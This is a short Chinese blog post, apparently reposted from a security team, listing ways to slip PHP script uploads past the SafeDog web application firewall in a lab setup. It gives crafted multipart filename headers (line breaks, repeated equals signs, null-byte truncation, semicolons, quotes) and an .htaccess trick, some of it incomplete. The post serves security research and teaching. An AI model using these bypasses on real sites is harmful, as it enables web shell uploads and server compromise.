综述
文件上传实质上还是客户端的post请求,消息主题是一些上传信息。前端上传界面需要制定enctype为multipart/from-data 才能正常上传文件。
此处不讲各种中间件解析漏洞,只列举几种safe_dog对脚本文件上传拦截的绕过。
靶机环境:
win2003+safe_dog4.0.23957+webug中的上传
1、换行
1 |
Content-Disposition: form-data; name="file"; filename="1.p |
2、多个等号 (不止2,3个)
1 |
Content-Disposition: form-data; name="file"; filename=="2.php" |
1 |
Content-Disposition: form-data; name="file"; filename==="3.php" |
3、00截断
1 |
Content-Disposition: form-data; name="file"; filename="4.php%00" |
4、文件名+;号
1 |
Content-Disposition: form-data; name="file"; filename="6;.php" |
5、文件名+‘
1 |
Content-Disposition: form-data; name="file"; filename="7'.php" |
6、上传.htaccess
1 |
Content-Disposition: form-data; name="file"; filename=".htaccess" |
然后再去正常的上传一个jpg文件,内容写为
最后访问8.jpg 以php解析
7、参考:
https://www.t00ls.net/viewthread.php?tid=51253&highlight=%E5%AE%89%E5%85%A8%E7%8B%97
https://www.t00ls.net/viewthread.php?tid=50690&highlight=%E5%AE%89%E5%85%A8%E7%8B%97
转载自T9Sec Team
FROM :b0urne.top | Author:b0urne
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论